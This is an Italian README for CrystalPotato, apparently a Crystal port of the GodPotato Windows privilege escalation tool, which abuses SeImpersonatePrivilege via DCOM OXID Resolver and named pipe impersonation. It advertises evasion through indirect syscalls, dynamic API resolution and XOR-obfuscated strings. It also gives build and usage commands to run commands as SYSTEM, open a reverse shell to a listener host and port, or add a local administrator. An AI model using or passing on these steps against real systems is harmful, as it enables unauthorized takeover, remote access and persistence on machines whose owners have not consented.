
Porting in Crystal di GodPotato per abusare di SeImpersonatePrivilege con syscall indirette, risoluzione dinamica delle API e offuscamento delle stringhe in fase di compilazione. Esegui comandi, reverse shell o aggiungi utenti.
Porting in Crystal di GodPotato, un'escalation locale dei privilegi da account con SeImpersonatePrivilege a SYSTEM. Funziona abusando del DCOM OXID Resolver e dell'impersonificazione delle named pipe.
Le API di Windows vengono risolte dinamicamente e invocate tramite stub di syscall indiretti, tutte le stringhe vengono offuscate con XOR in fase di compilazione e, per impostazione predefinita, viene stampato solo l'output del comando. Testato su Windows 10, 11 e Server 2025.
CrystalPotato si compila in un singolo file senza dipendenze utilizzando Crystal su Windows:
crystal build CrystalPotato.cr -o CrystalPotato.exe --release --static
Esegui un comando, avvia una reverse shell o crea un amministratore locale.
CrystalPotato.exe -c <COMMAND>
CrystalPotato.exe -H <LHOST> -P <LPORT> [-c <SHELL>]
CrystalPotato.exe -u <USER> -pw <PASS>

GodPotato - Implementazione originale in C# di BeichenDream.
RustPotato - Implementazione in Rust di safedv.
SigmaPotato - Implementazione in C# con funzionalità aggiuntive di tylerdotrar.
| Flag | Descrizione |
|---|
-c CMD | Comando da eseguire come SYSTEM o shell per la reverse shell (predefinito: cmd.exe) |
-H HOST | Host del listener per la reverse shell |
-P PORT | Porta del listener per la reverse shell |
-u USER | Crea amministratore locale - Nome utente |
-pw PASS | Crea amministratore locale - Password |
-p NAME | Nome pipe personalizzato (predefinito: Crystal) |
-d | Output di debug |
-dd | Traccia completa |
-h | Mostra aiuto |